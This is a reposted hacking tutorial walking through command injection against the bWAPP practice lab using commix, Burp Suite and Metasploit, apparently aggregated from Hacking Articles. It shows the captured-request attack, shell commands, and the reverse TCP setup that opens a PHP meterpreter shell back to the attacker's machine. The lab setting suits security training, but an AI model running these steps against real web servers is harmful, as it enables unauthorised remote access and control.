Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Command Injection to Meterpreter using Commix

$
0
0

In this article I will show how easily you can hack a web server using commix tool if the severe is suffering from OS command injection vulnerbility and try to access meterpreter shell.

Attaker: kali linux

Target: bwapp

Download it from here and install and run it with VM ware.

Being an attacker browser target IP in browse:192.168.0.105/bwapp , now Login with bee:bug as credential and select OS command injection from choose your bug; then click on hack .


Command Injection to Meterpreter using Commix

Here requested web page gets open where you can execute any command. Now I will start burp suite to capture the request. In order to start intercept click the proxy tab and turn on intercept ; don’t forget to run proxy inside the browser. Now give any command like IP: 192.168.0.105 and click on lookup .


Command Injection to Meterpreter using Commix

Inside burp suite you will get the post request has been captured. Here we have victim’s details which will be helpful for making an attack on its web server. Now select the whole data from POST……. &form=submit then copied it and saved in a text file. I had saved it as os.txt and further use it with commix.


Command Injection to Meterpreter using Commix

In previous tutorial we had used manual step inside commix to execute the given command for making attack but here the step is more easy and convenience to apply for making an attack. Now Type following command for commix to start attack.

Commix r /root/Desktop/os.txt

Hit enteror press Y as reply of every question. From given screenshot you can see I have got the victim’s shell and here I had executed following command to retrieve victim’s detail.

Whoami

Id


Command Injection to Meterpreter using Commix

Now start reverse tcp connection using below steps.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.0.104

commix(reverse_tcp) > set LPORT 8888

Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set target Type ‘5’ to use php meterpreter reverse tcp shell.

commix(reverse_tcp) >5


Command Injection to Meterpreter using Commix

Copythe highlighted text and paste it on anther terminal which will load metasploit framework and start multi handler automatically at background.


Command Injection to Meterpreter using Commix

Once the metasploit get loaded then move back to previous terminal where commix is running hit enter here.


Command Injection to Meterpreter using Commix

From given screenshot you can see I have got meterpreter shell.

Meterpreter>sysinfo


Command Injection to Meterpreter using Commix

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Viewing all articles
Browse latest Browse all 12749

Trending Articles